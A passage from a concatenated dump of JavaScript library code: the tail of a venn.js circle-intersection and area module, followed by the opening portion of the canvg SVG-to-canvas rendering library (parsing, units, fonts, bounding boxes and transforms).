                p.angle = Math.atan2(p.x - center.x, p.y - center.y);
            }
            innerPoints.sort(function(a,b) { return b.angle - a.angle;});

            // iterate over all points, get arc between the points
            // and update the areas
            var p2 = innerPoints[innerPoints.length - 1];
            for (i = 0; i < innerPoints.length; ++i) {
                var p1 = innerPoints[i];

                // polygon area updates easily ...
                polygonArea += (p2.x + p1.x) * (p1.y - p2.y);

                // updating the arc area is a little more involved
                var midPoint = {x : (p1.x + p2.x) / 2,
                                y : (p1.y + p2.y) / 2},
                    arc = null;

                for (var j = 0; j < p1.parentIndex.length; ++j) {
                    if (p2.parentIndex.indexOf(p1.parentIndex[j]) > -1) {
                        // figure out the angle halfway between the two points
                        // on the current circle
                        var circle = circles[p1.parentIndex[j]],
                            a1 = Math.atan2(p1.x - circle.x, p1.y - circle.y),
                            a2 = Math.atan2(p2.x - circle.x, p2.y - circle.y);

                        var angleDiff = (a2 - a1);
                        if (angleDiff < 0) {
                            angleDiff += 2*Math.PI;
                        }

                        // and use that angle to figure out the width of the
                        // arc
                        var a = a2 - angleDiff/2,
                            width = venn.distance(midPoint, {
                                x : circle.x + circle.radius * Math.sin(a),
                                y : circle.y + circle.radius * Math.cos(a)
                            });

                        // pick the circle whose arc has the smallest width
                        if ((arc === null) || (arc.width > width)) {
                            arc = { circle : circle,
                                    width : width,
                                    p1 : p1,
                                    p2 : p2};
                        }
                    }
                }
                arcs.push(arc);
                arcArea += venn.circleArea(arc.circle.radius, arc.width);
                p2 = p1;
            }
        } else {
            // no intersection points, is either disjoint - or is completely
            // overlapped. figure out which by examining the smallest circle
            var smallest = circles[0];
            for (i = 1; i < circles.length; ++i) {
                if (circles[i].radius < smallest.radius) {
                    smallest = circles[i];
                }
            }

            // make sure the smallest circle is completely contained in all
            // the other circles
            var disjoint = false;
            for (i = 0; i < circles.length; ++i) {
                if (venn.distance(circles[i], smallest) > Math.abs(smallest.radius - circles[i].radius)) {
                    disjoint = true;
                    break;
                }
            }

            if (disjoint) {
                arcArea = polygonArea = 0;

            } else {
                arcArea = smallest.radius * smallest.radius * Math.PI;
                arcs.push({circle : smallest,
                           p1: { x: smallest.x,        y : smallest.y + smallest.radius},
                           p2: { x: smallest.x - SMALL, y : smallest.y + smallest.radius},
                           width : smallest.radius * 2 });
            }
        }

        polygonArea /= 2;
        if (stats) {
            stats.area = arcArea + polygonArea;
            stats.arcArea = arcArea;
            stats.polygonArea = polygonArea;
            stats.arcs = arcs;
            stats.innerPoints = innerPoints;
            stats.intersectionPoints = intersectionPoints;
        }

        return arcArea + polygonArea;
    };

    /** returns whether a point is contained by all of a list of circles */
    venn.containedInCircles = function(point, circles) {
        for (var i = 0; i < circles.length; ++i) {
            if (venn.distance(point, circles[i]) > circles[i].radius + SMALL) {
                return false;
            }
        }
        return true;
    };

    /** Gets all intersection points between a bunch of circles */
    function getIntersectionPoints(circles) {
        var ret = [];
        for (var i = 0; i < circles.length; ++i) {
            for (var j = i + 1; j < circles.length; ++j) {
                var intersect = venn.circleCircleIntersection(circles[i],
                                                              circles[j]);
                for (var k = 0; k < intersect.length; ++k) {
                    var p = intersect[k];
                    p.parentIndex = [i,j];
                    ret.push(p);
                }
            }
        }
        return ret;
    }

    venn.circleIntegral = function(r, x) {
        var y = Math.sqrt(r * r - x * x);
        return x * y + r * r * Math.atan2(x, y);
    };

    /** Returns the area of a circle of radius r - up to width */
    venn.circleArea = function(r, width) {
        return venn.circleIntegral(r, width - r) - venn.circleIntegral(r, -r);
    };


    /** euclidean distance between two points */
    venn.distance = function(p1, p2) {
        return Math.sqrt((p1.x - p2.x) * (p1.x - p2.x) +
                         (p1.y - p2.y) * (p1.y - p2.y));
    };


    /** Returns the overlap area of two circles of radius r1 and r2 - that
    have their centers separated by distance d. Simpler faster
    circle intersection for only two circles */
    venn.circleOverlap = function(r1, r2, d) {
        // no overlap
        if (d >= r1 + r2) {
            return 0;
        }

        // completely overlapped
        if (d <= Math.abs(r1 - r2)) {
            return Math.PI * Math.min(r1, r2) * Math.min(r1, r2);
        }

        var w1 = r1 - (d * d - r2 * r2 + r1 * r1) / (2 * d),
            w2 = r2 - (d * d - r1 * r1 + r2 * r2) / (2 * d);
        return venn.circleArea(r1, w1) + venn.circleArea(r2, w2);
    };


    /** Given two circles (containing a x/y/radius attributes),
    returns the intersecting points if possible.
    note: doesn't handle cases where there are infinitely many
    intersection points (circles are equivalent):, or only one intersection point*/
    venn.circleCircleIntersection = function(p1, p2) {
        var d = venn.distance(p1, p2),
            r1 = p1.radius,
            r2 = p2.radius;

        // if to far away, or self contained - can't be done
        if ((d >= (r1 + r2)) || (d <= Math.abs(r1 - r2))) {
            return [];
        }

        var a = (r1 * r1 - r2 * r2 + d * d) / (2 * d),
            h = Math.sqrt(r1 * r1 - a * a),
            x0 = p1.x + a * (p2.x - p1.x) / d,
            y0 = p1.y + a * (p2.y - p1.y) / d,
            rx = -(p2.y - p1.y) * (h / d),
            ry = -(p2.x - p1.x) * (h / d);

        return [{ x: x0 + rx, y : y0 - ry },
                { x: x0 - rx, y : y0 + ry }];
    };

    /** Returns the center of a bunch of points */
    venn.getCenter = function(points) {
        var center = { x: 0, y: 0};
        for (var i =0; i < points.length; ++i ) {
            center.x += points[i].x;
            center.y += points[i].y;
        }
        center.x /= points.length;
        center.y /= points.length;
        return center;
    };
}(window.venn = window.venn || {}));


==> results/VENN-Diag/canvg.js <==
/*
 * canvg.js - Javascript SVG parser and renderer on Canvas
 * MIT Licensed
 * Gabe Lerner (gabelerner@gmail.com)
 * http://code.google.com/p/canvg/
 *
 * Requires: rgbcolor.js - http://www.phpied.com/rgb-color-parser-in-javascript/
 */
 (function ( global, factory ) {

	'use strict';

	// export as AMD...
	if ( typeof define !== 'undefined' && define.amd ) {
		define('canvgModule', [ 'rgbcolor', 'stackblur' ], factory );
	}

	// ...or as browserify
	else if ( typeof module !== 'undefined' && module.exports ) {
		module.exports = factory( require( 'rgbcolor' ), require( 'stackblur' ) );
	}

	global.canvg = factory( global.RGBColor, global.stackBlur );

}( typeof window !== 'undefined' ? window : this, function ( RGBColor, stackBlur ) {
 
	// canvg(target, s)
	// empty parameters: replace all 'svg' elements on page with 'canvas' elements
	// target: canvas element or the id of a canvas element
	// s: svg string, url to svg file, or xml document
	// opts: optional hash of options
	//		 ignoreMouse: true => ignore mouse events
	//		 ignoreAnimation: true => ignore animations
	//		 ignoreDimensions: true => does not try to resize canvas
	//		 ignoreClear: true => does not clear canvas
	//		 offsetX: int => draws at a x offset
	//		 offsetY: int => draws at a y offset
	//		 scaleWidth: int => scales horizontally to width
	//		 scaleHeight: int => scales vertically to height
	//		 renderCallback: function => will call the function after the first render is completed
	//		 forceRedraw: function => will call the function on every frame, if it returns true, will redraw
	var canvg = function (target, s, opts) {
		// no parameters
		if (target == null && s == null && opts == null) {
			var svgTags = document.querySelectorAll('svg');
			for (var i=0; i<svgTags.length; i++) {
				var svgTag = svgTags[i];
				var c = document.createElement('canvas');
				c.width = svgTag.clientWidth;
				c.height = svgTag.clientHeight;
				svgTag.parentNode.insertBefore(c, svgTag);
				svgTag.parentNode.removeChild(svgTag);
				var div = document.createElement('div');
				div.appendChild(svgTag);
				canvg(c, div.innerHTML);
			}
			return;
		}

		if (typeof target == 'string') {
			target = document.getElementById(target);
		}

		// store class on canvas
		if (target.svg != null) target.svg.stop();
		var svg = build(opts || {});
		// on i.e. 8 for flash canvas, we can't assign the property so check for it
		if (!(target.childNodes.length == 1 && target.childNodes[0].nodeName == 'OBJECT')) target.svg = svg;

		var ctx = target.getContext('2d');
		if (typeof(s.documentElement) != 'undefined') {
			// load from xml doc
			svg.loadXmlDoc(ctx, s);
		}
		else if (s.substr(0,1) == '<') {
			// load from xml string
			svg.loadXml(ctx, s);
		}
		else {
			// load from url
			svg.load(ctx, s);
		}
	}

	// see https://developer.mozilla.org/en-US/docs/Web/API/Element.matches
	var matchesSelector;
	if (typeof(Element.prototype.matches) != 'undefined') {
		matchesSelector = function(node, selector) {
			return node.matches(selector);
		};
	} else if (typeof(Element.prototype.webkitMatchesSelector) != 'undefined') {
		matchesSelector = function(node, selector) {
			return node.webkitMatchesSelector(selector);
		};
	} else if (typeof(Element.prototype.mozMatchesSelector) != 'undefined') {
		matchesSelector = function(node, selector) {
			return node.mozMatchesSelector(selector);
		};
	} else if (typeof(Element.prototype.msMatchesSelector) != 'undefined') {
		matchesSelector = function(node, selector) {
			return node.msMatchesSelector(selector);
		};
	} else if (typeof(Element.prototype.oMatchesSelector) != 'undefined') {
		matchesSelector = function(node, selector) {
			return node.oMatchesSelector(selector);
		};
	} else {
		// requires Sizzle: https://github.com/jquery/sizzle/wiki/Sizzle-Documentation
		// or jQuery: http://jquery.com/download/
		// or Zepto: http://zeptojs.com/#
		// without it, this is a ReferenceError

		if (typeof jQuery === 'function' || typeof Zepto === 'function') {
			matchesSelector = function (node, selector) {
				return $(node).is(selector);
			};
		}

		if (typeof matchesSelector === 'undefined') {
			matchesSelector = Sizzle.matchesSelector;
		}
	}

	// slightly modified version of https://github.com/keeganstreet/specificity/blob/master/specificity.js
	var attributeRegex = /(\[[^\]]+\])/g;
	var idRegex = /(#[^\s\+>~\.\[:]+)/g;
	var classRegex = /(\.[^\s\+>~\.\[:]+)/g;
	var pseudoElementRegex = /(::[^\s\+>~\.\[:]+|:first-line|:first-letter|:before|:after)/gi;
	var pseudoClassWithBracketsRegex = /(:[\w-]+\([^\)]*\))/gi;
	var pseudoClassRegex = /(:[^\s\+>~\.\[:]+)/g;
	var elementRegex = /([^\s\+>~\.\[:]+)/g;
	function getSelectorSpecificity(selector) {
		var typeCount = [0, 0, 0];
		var findMatch = function(regex, type) {
			var matches = selector.match(regex);
			if (matches == null) {
				return;
			}
			typeCount[type] += matches.length;
			selector = selector.replace(regex, ' ');
		};

		selector = selector.replace(/:not\(([^\)]*)\)/g, '     $1 ');
		selector = selector.replace(/{[^]*/gm, ' ');
		findMatch(attributeRegex, 1);
		findMatch(idRegex, 0);
		findMatch(classRegex, 1);
		findMatch(pseudoElementRegex, 2);
		findMatch(pseudoClassWithBracketsRegex, 1);
		findMatch(pseudoClassRegex, 1);
		selector = selector.replace(/[\*\s\+>~]/g, ' ');
		selector = selector.replace(/[#\.]/g, ' ');
		findMatch(elementRegex, 2);
		return typeCount.join('');
	}

	function build(opts) {
		var svg = { opts: opts };

		svg.FRAMERATE = 30;
		svg.MAX_VIRTUAL_PIXELS = 30000;

		svg.log = function(msg) {};
		if (svg.opts['log'] == true && typeof(console) != 'undefined') {
			svg.log = function(msg) { console.log(msg); };
		};

		// globals
		svg.init = function(ctx) {
			var uniqueId = 0;
			svg.UniqueId = function () { uniqueId++; return 'canvg' + uniqueId;	};
			svg.Definitions = {};
			svg.Styles = {};
			svg.StylesSpecificity = {};
			svg.Animations = [];
			svg.Images = [];
			svg.ctx = ctx;
			svg.ViewPort = new (function () {
				this.viewPorts = [];
				this.Clear = function() { this.viewPorts = []; }
				this.SetCurrent = function(width, height) { this.viewPorts.push({ width: width, height: height }); }
				this.RemoveCurrent = function() { this.viewPorts.pop(); }
				this.Current = function() { return this.viewPorts[this.viewPorts.length - 1]; }
				this.width = function() { return this.Current().width; }
				this.height = function() { return this.Current().height; }
				this.ComputeSize = function(d) {
					if (d != null && typeof(d) == 'number') return d;
					if (d == 'x') return this.width();
					if (d == 'y') return this.height();
					return Math.sqrt(Math.pow(this.width(), 2) + Math.pow(this.height(), 2)) / Math.sqrt(2);
				}
			});
		}
		svg.init();

		// images loaded
		svg.ImagesLoaded = function() {
			for (var i=0; i<svg.Images.length; i++) {
				if (!svg.Images[i].loaded) return false;
			}
			return true;
		}

		// trim
		svg.trim = function(s) { return s.replace(/^\s+|\s+$/g, ''); }

		// compress spaces
		svg.compressSpaces = function(s) { return s.replace(/[\s\r\t\n]+/gm,' '); }

		// ajax
		svg.ajax = function(url) {
			var AJAX;
			if(window.XMLHttpRequest){AJAX=new XMLHttpRequest();}
			else{AJAX=new ActiveXObject('Microsoft.XMLHTTP');}
			if(AJAX){
			   AJAX.open('GET',url,false);
			   AJAX.send(null);
			   return AJAX.responseText;
			}
			return null;
		}

		// parse xml
		svg.parseXml = function(xml) {
			if (typeof(Windows) != 'undefined' && typeof(Windows.Data) != 'undefined' && typeof(Windows.Data.Xml) != 'undefined') {
				var xmlDoc = new Windows.Data.Xml.Dom.XmlDocument();
				var settings = new Windows.Data.Xml.Dom.XmlLoadSettings();
				settings.prohibitDtd = false;
				xmlDoc.loadXml(xml, settings);
				return xmlDoc;
			}
			else if (window.DOMParser)
			{
				var parser = new DOMParser();
				return parser.parseFromString(xml, 'text/xml');
			}
			else
			{
				xml = xml.replace(/<!DOCTYPE svg[^>]*>/, '');
				var xmlDoc = new ActiveXObject('Microsoft.XMLDOM');
				xmlDoc.async = 'false';
				xmlDoc.loadXML(xml);
				return xmlDoc;
			}
		}

		svg.Property = function(name, value) {
			this.name = name;
			this.value = value;
		}
			svg.Property.prototype.getValue = function() {
				return this.value;
			}

			svg.Property.prototype.hasValue = function() {
				return (this.value != null && this.value !== '');
			}

			// return the numerical value of the property
			svg.Property.prototype.numValue = function() {
				if (!this.hasValue()) return 0;

				var n = parseFloat(this.value);
				if ((this.value + '').match(/%$/)) {
					n = n / 100.0;
				}
				return n;
			}

			svg.Property.prototype.valueOrDefault = function(def) {
				if (this.hasValue()) return this.value;
				return def;
			}

			svg.Property.prototype.numValueOrDefault = function(def) {
				if (this.hasValue()) return this.numValue();
				return def;
			}

			// color extensions
				// augment the current color value with the opacity
				svg.Property.prototype.addOpacity = function(opacityProp) {
					var newValue = this.value;
					if (opacityProp.value != null && opacityProp.value != '' && typeof(this.value)=='string') { // can only add opacity to colors, not patterns
						var color = new RGBColor(this.value);
						if (color.ok) {
							newValue = 'rgba(' + color.r + ', ' + color.g + ', ' + color.b + ', ' + opacityProp.numValue() + ')';
						}
					}
					return new svg.Property(this.name, newValue);
				}

			// definition extensions
				// get the definition from the definitions table
				svg.Property.prototype.getDefinition = function() {
					var name = this.value.match(/#([^\)'"]+)/);
					if (name) { name = name[1]; }
					if (!name) { name = this.value; }
					return svg.Definitions[name];
				}

				svg.Property.prototype.isUrlDefinition = function() {
					return this.value.indexOf('url(') == 0
				}

				svg.Property.prototype.getFillStyleDefinition = function(e, opacityProp) {
					var def = this.getDefinition();

					// gradient
					if (def != null && def.createGradient) {
						return def.createGradient(svg.ctx, e, opacityProp);
					}

					// pattern
					if (def != null && def.createPattern) {
						if (def.getHrefAttribute().hasValue()) {
							var pt = def.attribute('patternTransform');
							def = def.getHrefAttribute().getDefinition();
							if (pt.hasValue()) { def.attribute('patternTransform', true).value = pt.value; }
						}
						return def.createPattern(svg.ctx, e);
					}

					return null;
				}

			// length extensions
				svg.Property.prototype.getDPI = function(viewPort) {
					return 96.0; // TODO: compute?
				}

				svg.Property.prototype.getEM = function(viewPort) {
					var em = 12;

					var fontSize = new svg.Property('fontSize', svg.Font.Parse(svg.ctx.font).fontSize);
					if (fontSize.hasValue()) em = fontSize.toPixels(viewPort);

					return em;
				}

				svg.Property.prototype.getUnits = function() {
					var s = this.value+'';
					return s.replace(/[0-9\.\-]/g,'');
				}

				// get the length as pixels
				svg.Property.prototype.toPixels = function(viewPort, processPercent) {
					if (!this.hasValue()) return 0;
					var s = this.value+'';
					if (s.match(/em$/)) return this.numValue() * this.getEM(viewPort);
					if (s.match(/ex$/)) return this.numValue() * this.getEM(viewPort) / 2.0;
					if (s.match(/px$/)) return this.numValue();
					if (s.match(/pt$/)) return this.numValue() * this.getDPI(viewPort) * (1.0 / 72.0);
					if (s.match(/pc$/)) return this.numValue() * 15;
					if (s.match(/cm$/)) return this.numValue() * this.getDPI(viewPort) / 2.54;
					if (s.match(/mm$/)) return this.numValue() * this.getDPI(viewPort) / 25.4;
					if (s.match(/in$/)) return this.numValue() * this.getDPI(viewPort);
					if (s.match(/%$/)) return this.numValue() * svg.ViewPort.ComputeSize(viewPort);
					var n = this.numValue();
					if (processPercent && n < 1.0) return n * svg.ViewPort.ComputeSize(viewPort);
					return n;
				}

			// time extensions
				// get the time as milliseconds
				svg.Property.prototype.toMilliseconds = function() {
					if (!this.hasValue()) return 0;
					var s = this.value+'';
					if (s.match(/s$/)) return this.numValue() * 1000;
					if (s.match(/ms$/)) return this.numValue();
					return this.numValue();
				}

			// angle extensions
				// get the angle as radians
				svg.Property.prototype.toRadians = function() {
					if (!this.hasValue()) return 0;
					var s = this.value+'';
					if (s.match(/deg$/)) return this.numValue() * (Math.PI / 180.0);
					if (s.match(/grad$/)) return this.numValue() * (Math.PI / 200.0);
					if (s.match(/rad$/)) return this.numValue();
					return this.numValue() * (Math.PI / 180.0);
				}

			// text extensions
				// get the text baseline
				var textBaselineMapping = {
					'baseline': 'alphabetic',
					'before-edge': 'top',
					'text-before-edge': 'top',
					'middle': 'middle',
					'central': 'middle',
					'after-edge': 'bottom',
					'text-after-edge': 'bottom',
					'ideographic': 'ideographic',
					'alphabetic': 'alphabetic',
					'hanging': 'hanging',
					'mathematical': 'alphabetic'
				};
				svg.Property.prototype.toTextBaseline = function () {
					if (!this.hasValue()) return null;
					return textBaselineMapping[this.value];
				}

		// fonts
		svg.Font = new (function() {
			this.Styles = 'normal|italic|oblique|inherit';
			this.Variants = 'normal|small-caps|inherit';
			this.Weights = 'normal|bold|bolder|lighter|100|200|300|400|500|600|700|800|900|inherit';

			this.CreateFont = function(fontStyle, fontVariant, fontWeight, fontSize, fontFamily, inherit) {
				var f = inherit != null ? this.Parse(inherit) : this.CreateFont('', '', '', '', '', svg.ctx.font);
				return {
					fontFamily: fontFamily || f.fontFamily,
					fontSize: fontSize || f.fontSize,
					fontStyle: fontStyle || f.fontStyle,
					fontWeight: fontWeight || f.fontWeight,
					fontVariant: fontVariant || f.fontVariant,
					toString: function () { return [this.fontStyle, this.fontVariant, this.fontWeight, this.fontSize, this.fontFamily].join(' ') }
				}
			}

			var that = this;
			this.Parse = function(s) {
				var f = {};
				var d = svg.trim(svg.compressSpaces(s || '')).split(' ');
				var set = { fontSize: false, fontStyle: false, fontWeight: false, fontVariant: false }
				var ff = '';
				for (var i=0; i<d.length; i++) {
					if (!set.fontStyle && that.Styles.indexOf(d[i]) != -1) { if (d[i] != 'inherit') f.fontStyle = d[i]; set.fontStyle = true; }
					else if (!set.fontVariant && that.Variants.indexOf(d[i]) != -1) { if (d[i] != 'inherit') f.fontVariant = d[i]; set.fontStyle = set.fontVariant = true;	}
					else if (!set.fontWeight && that.Weights.indexOf(d[i]) != -1) {	if (d[i] != 'inherit') f.fontWeight = d[i]; set.fontStyle = set.fontVariant = set.fontWeight = true; }
					else if (!set.fontSize) { if (d[i] != 'inherit') f.fontSize = d[i].split('/')[0]; set.fontStyle = set.fontVariant = set.fontWeight = set.fontSize = true; }
					else { if (d[i] != 'inherit') ff += d[i]; }
				} if (ff != '') f.fontFamily = ff;
				return f;
			}
		});

		// points and paths
		svg.ToNumberArray = function(s) {
			var a = svg.trim(svg.compressSpaces((s || '').replace(/,/g, ' '))).split(' ');
			for (var i=0; i<a.length; i++) {
				a[i] = parseFloat(a[i]);
			}
			return a;
		}
		svg.Point = function(x, y) {
			this.x = x;
			this.y = y;
		}
			svg.Point.prototype.angleTo = function(p) {
				return Math.atan2(p.y - this.y, p.x - this.x);
			}

			svg.Point.prototype.applyTransform = function(v) {
				var xp = this.x * v[0] + this.y * v[2] + v[4];
				var yp = this.x * v[1] + this.y * v[3] + v[5];
				this.x = xp;
				this.y = yp;
			}

		svg.CreatePoint = function(s) {
			var a = svg.ToNumberArray(s);
			return new svg.Point(a[0], a[1]);
		}
		svg.CreatePath = function(s) {
			var a = svg.ToNumberArray(s);
			var path = [];
			for (var i=0; i<a.length; i+=2) {
				path.push(new svg.Point(a[i], a[i+1]));
			}
			return path;
		}

		// bounding box
		svg.BoundingBox = function(x1, y1, x2, y2) { // pass in initial points if you want
			this.x1 = Number.NaN;
			this.y1 = Number.NaN;
			this.x2 = Number.NaN;
			this.y2 = Number.NaN;

			this.x = function() { return this.x1; }
			this.y = function() { return this.y1; }
			this.width = function() { return this.x2 - this.x1; }
			this.height = function() { return this.y2 - this.y1; }

			this.addPoint = function(x, y) {
				if (x != null) {
					if (isNaN(this.x1) || isNaN(this.x2)) {
						this.x1 = x;
						this.x2 = x;
					}
					if (x < this.x1) this.x1 = x;
					if (x > this.x2) this.x2 = x;
				}

				if (y != null) {
					if (isNaN(this.y1) || isNaN(this.y2)) {
						this.y1 = y;
						this.y2 = y;
					}
					if (y < this.y1) this.y1 = y;
					if (y > this.y2) this.y2 = y;
				}
			}
			this.addX = function(x) { this.addPoint(x, null); }
			this.addY = function(y) { this.addPoint(null, y); }

			this.addBoundingBox = function(bb) {
				this.addPoint(bb.x1, bb.y1);
				this.addPoint(bb.x2, bb.y2);
			}

			this.addQuadraticCurve = function(p0x, p0y, p1x, p1y, p2x, p2y) {
				var cp1x = p0x + 2/3 * (p1x - p0x); // CP1 = QP0 + 2/3 *(QP1-QP0)
				var cp1y = p0y + 2/3 * (p1y - p0y); // CP1 = QP0 + 2/3 *(QP1-QP0)
				var cp2x = cp1x + 1/3 * (p2x - p0x); // CP2 = CP1 + 1/3 *(QP2-QP0)
				var cp2y = cp1y + 1/3 * (p2y - p0y); // CP2 = CP1 + 1/3 *(QP2-QP0)
				this.addBezierCurve(p0x, p0y, cp1x, cp2x, cp1y,	cp2y, p2x, p2y);
			}

			this.addBezierCurve = function(p0x, p0y, p1x, p1y, p2x, p2y, p3x, p3y) {
				// from http://blog.hackers-cafe.net/2009/06/how-to-calculate-bezier-curves-bounding.html
				var p0 = [p0x, p0y], p1 = [p1x, p1y], p2 = [p2x, p2y], p3 = [p3x, p3y];
				this.addPoint(p0[0], p0[1]);
				this.addPoint(p3[0], p3[1]);

				for (i=0; i<=1; i++) {
					var f = function(t) {
						return Math.pow(1-t, 3) * p0[i]
						+ 3 * Math.pow(1-t, 2) * t * p1[i]
						+ 3 * (1-t) * Math.pow(t, 2) * p2[i]
						+ Math.pow(t, 3) * p3[i];
					}

					var b = 6 * p0[i] - 12 * p1[i] + 6 * p2[i];
					var a = -3 * p0[i] + 9 * p1[i] - 9 * p2[i] + 3 * p3[i];
					var c = 3 * p1[i] - 3 * p0[i];

					if (a == 0) {
						if (b == 0) continue;
						var t = -c / b;
						if (0 < t && t < 1) {
							if (i == 0) this.addX(f(t));
							if (i == 1) this.addY(f(t));
						}
						continue;
					}

					var b2ac = Math.pow(b, 2) - 4 * c * a;
					if (b2ac < 0) continue;
					var t1 = (-b + Math.sqrt(b2ac)) / (2 * a);
					if (0 < t1 && t1 < 1) {
						if (i == 0) this.addX(f(t1));
						if (i == 1) this.addY(f(t1));
					}
					var t2 = (-b - Math.sqrt(b2ac)) / (2 * a);
					if (0 < t2 && t2 < 1) {
						if (i == 0) this.addX(f(t2));
						if (i == 1) this.addY(f(t2));
					}
				}
			}

			this.isPointInBox = function(x, y) {
				return (this.x1 <= x && x <= this.x2 && this.y1 <= y && y <= this.y2);
			}

			this.addPoint(x1, y1);
			this.addPoint(x2, y2);
		}

		// transforms
		svg.Transform = function(v) {
			var that = this;
			this.Type = {}

			// translate
			this.Type.translate = function(s) {
				this.p = svg.CreatePoint(s);
				this.apply = function(ctx) {
					ctx.translate(this.p.x || 0.0, this.p.y || 0.0);
				}
				this.unapply = function(ctx) {
					ctx.translate(-1.0 * this.p.x || 0.0, -1.0 * this.p.y || 0.0);
				}
				this.applyToPoint = function(p) {
					p.applyTransform([1, 0, 0, 1, this.p.x || 0.0, this.p.y || 0.0]);
				}
			}

			// rotate
			this.Type.rotate = function(s) {
				var a = svg.ToNumberArray(s);
				this.angle = new svg.Property('angle', a[0]);
				this.cx = a[1] || 0;
				this.cy = a[2] || 0;
				this.apply = function(ctx) {
					ctx.translate(this.cx, this.cy);
					ctx.rotate(this.angle.toRadians());
					ctx.translate(-this.cx, -this.cy);
				}
				this.unapply = function(ctx) {
					ctx.translate(this.cx, this.cy);
					ctx.rotate(-1.0 * this.angle.toRadians());
					ctx.translate(-this.cx, -this.cy);
				}
				this.applyToPoint = function(p) {
					var a = this.angle.toRadians();
					p.applyTransform([1, 0, 0, 1, this.p.x || 0.0, this.p.y || 0.0]);
					p.applyTransform([Math.cos(a), Math.sin(a), -Math.sin(a), Math.cos(a), 0, 0]);
					p.applyTransform([1, 0, 0, 1, -this.p.x || 0.0, -this.p.y || 0.0]);
				}
			}

			this.Type.scale = function(s) {
				this.p = svg.CreatePoint(s);
				this.apply = function(ctx) {
					ctx.scale(this.p.x || 1.0, this.p.y || this.p.x || 1.0);
				}
				this.unapply = function(ctx) {
					ctx.scale(1.0 / this.p.x || 1.0, 1.0 / this.p.y || this.p.x || 1.0);
				}
				this.applyToPoint = function(p) {
					p.applyTransform([this.p.x || 0.0, 0, 0, this.p.y || 0.0, 0, 0]);
				}
			}

			this.Type.matrix = function(s) {
				this.m = svg.ToNumberArray(s);
				this.apply = function(ctx) {
					ctx.transform(this.m[0], this.m[1], this.m[2], this.m[3], this.m[4], this.m[5]);
				}
				this.unapply = function(ctx) {
					var a = this.m[0];
					var b = this.m[2];
					var c = this.m[4];
					var d = this.m[1];
					var e = this.m[3];
					var f = this.m[5];
					var g = 0.0;
					var h = 0.0;
					var i = 1.0;
					var det = 1 / (a*(e*i-f*h)-b*(d*i-f*g)+c*(d*h-e*g));
					ctx.transform(
						det*(e*i-f*h),
						det*(f*g-d*i),
						det*(c*h-b*i),
						det*(a*i-c*g),
						det*(b*f-c*e),
						det*(c*d-a*f)
					);
				}
				this.applyToPoint = function(p) {
					p.applyTransform(this.m);
				}
			}

			this.Type.SkewBase = function(s) {
				this.base = that.Type.matrix;
				this.base(s);
				this.angle = new svg.Property('angle', s);
			}
			this.Type.SkewBase.prototype = new this.Type.matrix;

			this.Type.skewX = function(s) {
				this.base = that.Type.SkewBase;
				this.base(s);
				this.m = [1, 0, Math.tan(this.angle.toRadians()), 1, 0, 0];
			}
			this.Type.skewX.prototype = new this.Type.SkewBase;

			this.Type.skewY = function(s) {
				this.base = that.Type.SkewBase;
				this.base(s);
				this.m = [1, Math.tan(this.angle.toRadians()), 0, 1, 0, 0];
			}
			this.Type.skewY.prototype = new this.Type.SkewBase;

			this.transforms = [];

			this.apply = function(ctx) {
				for (var i=0; i<this.transforms.length; i++) {
					this.transforms[i].apply(ctx);
				}
			}

			this.unapply = function(ctx) {
				for (var i=this.transforms.length-1; i>=0; i--) {
					this.transforms[i].unapply(ctx);
				}
			}

			this.applyToPoint = function(p) {
				for (var i=0; i<this.transforms.length; i++) {
					this.transforms[i].applyToPoint(p);
				}
			}

			var data = svg.trim(svg.compressSpaces(v)).replace(/\)([a-zA-Z])/g, ') $1').replace(/\)(\s?,\s?)/g,') ').split(/\s(?=[a-z])/);
			for (var i=0; i<data.length; i++) {
				var type = svg.trim(data[i].split('(')[0]);
				var s = data[i].split('(')[1].replace(')','');
				var transform = new this.Type[type](s);
				transform.type = type;
				this.transforms.push(transform);
			}
		}

		// aspect ratio
		svg.AspectRatio = function(ctx, aspectRatio, width, desiredWidth, height, desiredHeight, minX, minY, refX, refY) {
			// aspect ratio - http://www.w3.org/TR/SVG/coords.html#PreserveAspectRatioAttribute
			aspectRatio = svg.compressSpaces(aspectRatio);
			aspectRatio = aspectRatio.replace(/^defer\s/,''); // ignore defer
			var align = aspectRatio.split(' ')[0] || 'xMidYMid';
			var meetOrSlice = aspectRatio.split(' ')[1] || 'meet';

			// calculate scale
			var scaleX = width / desiredWidth;
			var scaleY = height / desiredHeight;
			var scaleMin = Math.min(scaleX, scaleY);
			var scaleMax = Math.max(scaleX, scaleY);
			if (meetOrSlice == 'meet') { desiredWidth *= scaleMin; desiredHeight *= scaleMin; }
			if (meetOrSlice == 'slice') { desiredWidth *= scaleMax; desiredHeight *= scaleMax; }

			refX = new svg.Property('refX', refX);
			refY = new svg.Property('refY', refY);
			if (refX.hasValue() && refY.hasValue()) {
				ctx.translate(-scaleMin * refX.toPixels('x'), -scaleMin * refY.toPixels('y'));
			}
			else {
				// align
				if (align.match(/^xMid/) && ((meetOrSlice == 'meet' && scaleMin == scaleY) || (meetOrSlice == 'slice' && scaleMax == scaleY))) ctx.translate(width / 2.0 - desiredWidth / 2.0, 0);
				if (align.match(/YMid$/) && ((meetOrSlice == 'meet' && scaleMin == scaleX) || (meetOrSlice == 'slice' && scaleMax == scaleX))) ctx.translate(0, height / 2.0 - desiredHeight / 2.0);
				if (align.match(/^xMax/) && ((meetOrSlice == 'meet' && scaleMin == scaleY) || (meetOrSlice == 'slice' && scaleMax == scaleY))) ctx.translate(width - desiredWidth, 0);
				if (align.match(/YMax$/) && ((meetOrSlice == 'meet' && scaleMin == scaleX) || (meetOrSlice == 'slice' && scaleMax == scaleX))) ctx.translate(0, height - desiredHeight);
			}

			// scale
			if (align == 'none') ctx.scale(scaleX, scaleY);
			else if (meetOrSlice == 'meet') ctx.scale(scaleMin, scaleMin);
			else if (meetOrSlice == 'slice') ctx.scale(scaleMax, scaleMax);

			// translate
			ctx.translate(minX == null ? 0 : -minX, minY == null ? 0 : -minY);
		}

		// elements
		svg.Element = {}

		svg.EmptyProperty = new svg.Property('EMPTY', '');

		svg.Element.ElementBase = function(node) {
			this.attributes = {};
			this.styles = {};
			this.stylesSpecificity = {};
			this.children = [];

			// get or create attribute
			this.attribute = function(name, createIfNotExists) {
				var a = this.attributes[name];
				if (a != null) return a;

				if (createIfNotExists == true) { a = new svg.Property(name, ''); this.attributes[name] = a; }
				return a || svg.EmptyProperty;
			}

			this.getHrefAttribute = function() {
				for (var a in this.attributes) {
					if (a == 'href' || a.match(/:href$/)) {
						return this.attributes[a];
					}
				}
